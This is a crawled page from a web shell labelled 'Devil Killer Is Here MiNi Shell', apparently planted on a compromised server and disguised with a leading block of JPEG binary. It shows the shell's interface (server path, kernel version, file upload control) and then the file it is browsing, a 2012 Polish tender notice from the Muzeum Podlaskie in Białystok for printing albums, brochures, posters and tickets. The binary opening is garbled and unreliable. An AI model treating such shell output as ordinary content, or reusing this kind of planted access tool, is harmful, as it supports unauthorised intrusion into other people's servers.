JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/15286-N-2012.html

<p class="kh_header"><b>Białystok: Usługa poligraficzna: projekt, skład i druk albumów, wydawnictw książkowych katalogów, plakatów, folderów, ulotek informacyjnych, pocztówek, druków reklamowych, materiałów do aranżacji wystaw, biletów wstępu i zaproszeń na  wystawy dla Muzeum Podlaskiego w Białymstoku  w roku 2012 .</b><br>
<b>Numer ogłoszenia: 15286 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Podlaskie w Białymstoku , ul. Ratusz-Rynek Kościuszki 10, 15-426 Białystok, woj. podlaskie, tel. 085 7421473, 7421440.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa poligraficzna: projekt, skład i druk albumów, wydawnictw książkowych katalogów, plakatów, folderów, ulotek informacyjnych, pocztówek, druków reklamowych, materiałów do aranżacji wystaw, biletów wstępu i zaproszeń na  wystawy dla Muzeum Podlaskiego w Białymstoku  w roku 2012 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I zamówienia 
Usługa poligraficzna polega na przygotowaniu projektu, opracowaniu zdjęć, sporządzenie składu, przygotowanie do druku i druk albumów z reprodukcjami dzieł sztuki . W zakres przedmiotu zamówienia  wchodzi  korekta tekstów .

Albumy
     1. album - format 270 x 300 cm, obj. 60 str., kreda mat. 150 g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130 g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 500 egz.  wydawnictwo posiada Nr ISBN  nakład 500  szt.
     2. album - format 270 x 300 cm, obj. 200 str., kreda mat. 150 g, kolor 4+4, oprawa twarda szyta nićmi, oklejka 130 g, kolor 4+0+folia matowa, wyklejka niezadrukowana, nakład 500 egz.  wydawnictwo posiada Nr ISBN nakład 500 szt.

Część II zamówienia. 
Usługa poligraficzna polega na przygotowaniu projektu, opracowaniu zdjęć, sporządzeniu składu, przygotowanie do druku i druku książek, katalogów /informatorów oraz druk zeszytów edukacyjnych (projekt dostarczy Zamawiający). Przy druku książek w zakres przedmiotu zamówienia wchodzi również korekta tekstów. Przy druku informatorów i zeszytów edukacyjnych korektę tekstów wykona Zamawiający.

Książki
1. książka, format B5, 80 str., kreda mat. 130 g,  kolor 4+4, oprawa miękka, klejona, okładka (rozkładane pierwsze skrzydełko na szerokość całej strony) - karton  240 g, kolor 4+4+ folia błyszcząca,  (w tym 500 egz. wersja polskojęzyczna, 500 egz. wersja angielskojęzyczna) wydawnictwo posiada Nr ISBN
nakład 1.000 egz.
2. książka, format B5, obj. 200 str., kreda mat. 130 g,  kolor 4+4, oprawa miękka, klejona, okładka karton  z białym spodem 240 g, kolor 4+0+ folia matowa, wydawnictwo posiada Nr ISBN nakład 500 egz.

Katalogi/informatory
1. informator oferty edukacyjnej, format A5 poziom (148 x 210mm), środek 16 stron, kreda mat. 130 g, kolor 4+4, okładka kreda mat. 300g, kolor 4+1+lakier offsetowy, szycie zeszytowe, nakład 2.000 szt.
2. informator, format A4, środek: obj. 12 str., kreda mat. 150 g., kolor 4+4, okładka: kreda 300 g, kolor 4+1+lakier offsetowy, szycie zeszytowe,  wydawnictwo posiada Nr ISBN nakład - 300 egz.  
3. informator, format B5, środek obj. 12 str., papier, 130 g kreda mat., kolor 1+ 1,  okładka - kreda mat. 300 g., kolor 4 + 1 + lakier offsetowy, szycie zeszytowe,wydawnictwo posiada Nr ISBN nakład 300 egz
4. śpiewnik piosenek niepodległościowych, format  A5 poziom ( 148 x 210 mm), środek - 12 stron, papier offset 90 g, kolor 4+ 4 , okładka kreda mat. 300 g, kolor 4 + 1 + lakier offsetowy, szycie zeszytowe, nakład  300 egz.
5.  informator, format A3 składane na 2, obj. 8 str., kreda mat.  200 g, kolor 4+4+lakier offsetowy, nakład 2000 szt (w tym 1.000 szt. wersja angielska, 1.000 szt. wersja rosyjska)  .
6. informator, format B5, środek: obj. 24 str., kreda mat. 130 g, kolor 4+4, okładka - kreda mat. 300 g, kolor 4+0+lakier offsetowy, szycie zeszytowe,. nakład 1.500 egz (w tym 1.000 egz. w języku polskim, 500 egz. w języku angielskim) wydawnictwo posiada Nr ISBN ,  

Zeszyty edukacyjne
1.  zeszyt edukacyjny, format A4, 16 stron, papier offset 90 g, kolor 1+1, okładka, karton 200 g, kolor   4+0+lakier offsetowy, nakład 500 szt.  projekt dostarcza Zamawiający 
2. zeszyt edukacyjny, format A4, 20 stron, kolor 4+4, papier offset 120 g, okładka karton 200 g., kolor 4+0+lakier offsetowy, nakład 1.000 egz. projekt dostarcza Zamawiający 
3. zeszyt edukacyjny, format A4, 20 stron, kolor 4+4, papier offset 120 g, okładka karton 200 g., kolor 4+0+lakier offsetowy, nakład 2.000 egz. projekt dostarcza Zamawiający 
4. zeszyt edukacyjny, format A4, środek - 24 stron, papier offset 90 g, kolor 4 + 4, wkładka formatu A4 - wydruk na folii samoprzylepnej, kolor - 4 + 0, okładka karton 200 g, kolor 4 + 0 + lakier offsetowy, nakład - 1000 szt. projekt dostarcza Zamawiający 
5. teczka z kompletem 16 kartek: teczka format A4 (2xA4+na spodniej części skrzydełka od dołu i z boku, z nacięciem pozwalającym na ich połączenie; podwójne bigowania na zgięciach), karton 270 g + folia błyszcząca, kolor 4+0; środek: 16 kart formatu A4, kreda mat 300 g, kolor 4+1, nakład 500 kompletów   

Część III zamówienia. 
Usługa poligraficzna polega na przygotowaniu projektu, opracowaniu zdjęć, sporządzeniu składu, przygotowanie do druku i druku folderów/składanek, zaproszeń, pocztówek, zakładek , ulotek  oraz druk wizytówek.

Foldery/składanki
1. folder, format A4 (składany na 2 do formatu A5) 1 bigowanie, kreda mat. 200 g, kolor 4+4+lakier offsetowy, nakład 300 szt
2. folder, format A4 (składany na 3), 2 bigi, kreda mat. 150 g, kolor 4+4,. (1000 - wersja polska, 1000 - wersja    angielska, 1000 - wersja niemiecka) nakład 3000 szt 
3. folder format 400x210 mm, składane na cztery (3 bigi), kreda mat. 250 g, kolor 4+4+lakier offsetowy, (w tym 2.000 szt. wersja polskojęzyczna, 1.000 szt. wersja angielskojęzyczna) nakład 3000 szt
4. folder, format 29,6 x 58,6 cm (składany na 4), 3 bigowania, kreda mat. 200 g, kolor 4 + 4+lakier offsetowy, nakład 1000 egz.   
5. folder, format B4 składany na trzy (dwa bigi), kreda mat.200g, kolor 4+4 lakier offsetowy, nakład 1000   egz.
6.folder, format A4 (składany na 3), 2 bigowania, kreda mat. 200 g, kolor 4+4+lakier offsetowy, wszywka w jedno bigowanie - 8 stron formatu 1/3 A4, papier offset 80 g, kolor 1+1, nakład 600 egz.
7. folder, format ? A3 (105mm x 420mm) składany na 4 do formatu A6 - 3 bigi, kreda mat. 300 g, kolor 4+4+lakier offsetowy(lub folia), nakład 500 szt.
8. folder, format A4  składany na 3 - 2 bigi, kreda mat. 130 g , kolor 1+ 1, nakład 200 egz.
9. folder, format A3 (składany na 3) dwa bigi, kreda mat. 200 g, kolor 4+4+lakier offsetowy, nakład 4 x 400   szt.   
10. folder, format A3 (składany na 3) dwa bigi, kreda mat. 200 g, kolor 4+4+lakier offsetowy, nakład 2x 1500 szt.  (w każdym nakładzie 1.000 szt. wersja polska, 500 szt. wersja angielska)

Zaproszenia
1. zaproszenie, format A5, kreda mat 300 g, kolor 2+2+lakier offsetowy, nakład 600 szt.
2. zaproszenie, format A5, kreda mat 300 g, kolor 2+2+lakier offsetowy, nakład 300 szt.
3. zaproszenie, format A5 składane do A6 (pion), kolor 4+4, kreda mat. 250 g, nakład 5 x 250 szt.  
4. zaproszenie, format A4 (składane na dwa), 1 bigowanie, kreda mat. 250 g, kolor 4+4, nakład 1000 szt.  
5. zaproszenie, format A4 (składane na trzy), 2 bigi  , kreda mat. 250 g, kolor 4+0, nakład 4000 szt. ( w tym    dwa wzory po 2000 szt.)  Zamawiający dostarcza projekt

Pocztówki / reprodukcje.
1.pocztówka, format A6, kreda mat. 300 g, kolor 4+1+lakier offsetowy,   nakład 2 x 1000 szt.
2.składanka pocztówek w obwolucie: 8 pocztówek, format A5, kreda mat. 300 g+lakier offsetowy, kolor 4+1, obwoluta - format (3xA5 składana na trzy), 4 bigowania, kreda mat. 300 g+lakier offsetowy, kolor 4+1, nakład 1.000 kompletów   
3. składanka pocztówek w obwolucie: 9 pocztówek, format A6, kreda  mat. 300 g, kolor sepia+1+lakier offsetowy, obwoluta - format (3xA6 składana na trzy), 4 bigowania, kreda mat. 240 g, kolor sepia+1+lakier offsetowy, nakład 1000 kompletów   
4. pocztówka, format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 2 x 300 szt.
5. komplet pocztówek w obwolucie, 5 pocztówek - format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, obwoluta - format 3xA5, 4 bigi, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 500 kompletów
6. komplet pocztówek w obwolucie, 6 pocztówek - format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy, obwoluta - format 3xA5, 4 bigi, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 1000 kompletów
7. pocztówka, format A5, kreda mat. 300 g, kolor 4+1+lakier offsetowy,. nakład 2.000 szt  (w tym 2 wzory po 1.000 szt.) 
Ulotki
1. ulotka, format A5, kreda 140 g, kolor 4+4, nakład: 5 x 1.000 szt.
Zakładki
1. zakładka, format 6 cm x 20 cm, kreda 300 g, kolor 4+4+lakier offsetowy, nakład 1.000 szt.
2. zakładka, format  6 x 20,5 cm, kreda mat. 300 g, kolor 4 + 4 + lakier offsetowy,  nakład 2 x 500 szt. 
3. zakładka, format 6 cm x 20 cm, kreda mat. 300 g, kolor 4+1+lakier offsetowy, nakład 400 szt.
Wizytówki
1. wizytówka, 5x9 cm, papier ecrue 250g, kolor 2+0,. nakład 1.900 szt (1 wzór 1.000 szt., 1 wzór 500 szt,. 2 wzory po 200 szt.)., Zamawiający dostarczy projekt   
Część IV zamówienia .
Usługa poligraficzna obejmuje projekt, opracowanie zdjęć, sporządzenie składu, przygotowanie do druku i druku plakatów/afiszy materiałów do aranżacji wystaw ,    kalendarza naściennego, dyplomów  oraz druk biletów wstępu i papieru firmowego.
Plakaty/afisze.
1. afisz, format A1, papier offset, kolor 2+0, nakład 2 x 200 szt.
2. afisz, format A2, papier offset, kolor 2+0, nakład 2 x 200 szt.
3. gazeta, format A3 składany na 2, papier ecru offset 90 g, kolor 4+4, nakład 1.000 szt.
4. gazeta, format A3 składany na 2, papier ecru offset 90 g, kolor 1+1, nakład 2 x 1.000 szt. 
5. plakat, format A2, kreda 140 g, kolor 4+0, nakład: 5 x 300 szt
6. plakat , format A3 (poziom), kreda 150 g, kolor 4+0 nakład 20 szt.
7. plakat, format 100 cm x 70 cm, kreda 250g, kolor 4+0, 12 wzorów każdy w jednym wydruku  
8. plakat, format 70 cm x 100 cm, kreda 150 g, kolor 4+0, nakład 1.000 szt. (w tym 4 wzory po 250 szt.)  
9. plakat, format 50 cm x 70 cm, kreda 150 g, kolor 4+0, nakład 1.000 szt. (w tym 4 wzory po 250 szt.)  
10. plakat, format A3, kreda 150 g, kolor 4+0, nakład 200 szt
11. plakat, format A3, kreda 140 g, kolor 4+0, nakład: 2 x 500 szt.
Kalendarze
1. kalendarz naścienny w formie jednej karty formatu 100x70 (pion), kreda 200 g, kolor 4+4, oblistwowanie metalowe z zawieszką  nakład 500 szt.
Materiały do aranżacji wystaw
1. druk na winilu 300 m2
2. druk na siatce 100 m2
3. druk na papierze blueback 300 m 2
4. druk na folii samoprzylepnej podklejanej na spienione PCV 5 mm 200  m2
 Bilety wstępu
1. bilety wstępu: format 4 x14 cm, papier 80g kolor 1(pantone) +1(czarny), klejone w bloczkach po 100 szt. (wg załączonego wzoru),  nakład 50.000 szt. projekt dostarczy Zamawiający 
 
Inne
1. Papier firmowy, format A4, papier ecru 80 g, kolor 2+0,projekt dostarczy Zamawiający,  nakład 10.000 szt. 
2. Dyplom, format A4, papier offset 250 g, kolor 2+0, nakład 1.000 egz..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Materiały do aranżacji wystaw
1. druk na winilu 
2. druk na siatce 
3. druk na papierze blueback 
4. druk na folii samoprzylepnej podklejanej na spienione PCV 5 mm 

20% wartosci  zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 78.22.00.00-5, 78.22.50.00-0, 78.20.00.00-0, 78.21.00.00-1, 78.12.40.00-2, 78.15.10.00-0, 78.15.10.00-3, 74.83.13.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 11.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> szamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca przedstawi wykaz wykonanych  co najmniej 2 zamówień - każde odpowiadające swoim rodzajem i wartością przedmiotowi niniejszego zamówienia, zrealizowanych przez Wykonawcę w okresie  3 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie usług poligraficznych odpowiadających swoim rodzajem i wartością usługom stanowiącym  przedmiot zamówienia , z podaniem ich wartości ( nie mniejszej niż wartość zamówienia) oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że zamówienia  te zostały wykonane należycie, 

spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten uznany za spełniony jeżeli Wykonawca biedzie dysponować drukarnią usytuowaną w odległości nie większej niż 100 km od siedziby Zamawiającego (jest to uwarunkowane względami organizacyjnymi Zamawiającego i finansowymi) albo powinien przedstawić pisemne zobowiązanie innego podmiotu do udostępnienia Wykonawcy drukarni usytuowanej w odległości nie większej niż 100 km od siedziby Zamawiającego.

spelnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca będzie dysponował co najmniej jedną osobą posiadającą co najmniej 3 letnie doświadczenie w zakresie druku wydawnictw z reprodukcjami muzealnictwa, historii, historii sztuki, archeologii, etnografii lub przedstawi pisemne zobowiązanie innego podmiotu do udostępnienia co najmniej jednej osoby o takim doświadczeniu

spełnia nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony jeżeli Wykonawca przedstawi aktualną   polisę a w przypadku jej braku oświadczenie, że z chwilą podpisania umowy Wykonawca dostarczy aktualna polisę  ubezpieczeniową  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż  wartość zamówienia .

spełnia nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
